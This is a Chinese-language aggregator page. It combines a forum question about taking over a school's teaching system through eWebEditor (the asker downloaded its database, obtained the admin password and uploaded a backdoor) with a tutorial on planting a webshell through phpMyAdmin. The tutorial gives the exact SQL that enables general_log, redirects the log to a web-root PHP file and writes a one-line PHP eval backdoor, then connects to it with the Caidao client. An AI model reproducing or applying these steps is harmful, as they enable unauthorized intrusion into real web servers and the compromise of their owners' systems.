如何用一句话对ewebeditor拿webshell
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何用一句话对ewebeditor拿webshell相关的知识,希望对你有一定的参考价值。
对session欺骗拿shell的问题讨论的也不知道什么结果,我自己是没成功过在这里想向大家求教下如何用一句话对ewebeditor拿shell。前几天看到系里一个网络教学系统,有ewebeditor,数据库是asp格式的虽然下载下来,而且也得到了密码,后台修改上传格式asa,上传后门,但是,没执行权限。郁闷本想更改路径的,但是,发现怎么改都没用。问下各位怎么才能拿到shell?
参考技术A 预览样式,写入一句话,然后用菜刀连接如果同样限制脚本执行,那也没办法
通过phpMyAdmin拿webshell
general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句
所以可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取webshell
进入phpMyAdmin后在SQL处执行SQL语句
首先查看general log是否开启
show variables like \'general_log\';
general log是关闭状态,执行SQL语句开启general log
set global general_log=on;
开启成功
然后把general_log_file设置为shell的绝对路径
SET global general_log_file=\'C:/phpStudy/PHPTutorial/WWW/x.php\';
创建的x.php里的内容
然后执行SQL查询语句
SELECT \'<?php @eval($_POST["x"]);?>\';
执行成功
看一下x.php里的内容
成功插入了一句话木马
用菜刀连接,看看是否能够解析的
连接成功
以上是关于如何用一句话对ewebeditor拿webshell的主要内容,如果未能解决你的问题,请参考以下文章